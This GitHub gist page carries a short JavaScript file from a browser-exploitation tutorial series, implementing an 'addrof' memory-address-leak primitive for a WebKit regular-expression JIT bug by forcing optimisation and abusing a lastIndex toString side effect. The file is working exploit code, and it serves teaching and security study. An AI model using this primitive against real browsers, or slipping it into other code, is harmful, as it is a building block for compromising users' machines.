Skip to content

Instantly share code, notes, and snippets.

@LiveOverflow LiveOverflow/test.js
Last active Jun 22, 2019

Embed
What would you like to do?
Browser Exploitation - bowser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrGetter = function(array) {
//reg[Symbol.match]();
"abc".match(reg);
return array[0];
}
// Force optimization
for (var i = 0; i < 10000; ++i)
AddrGetter(array);
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = val;
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
return AddrGetter(array);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.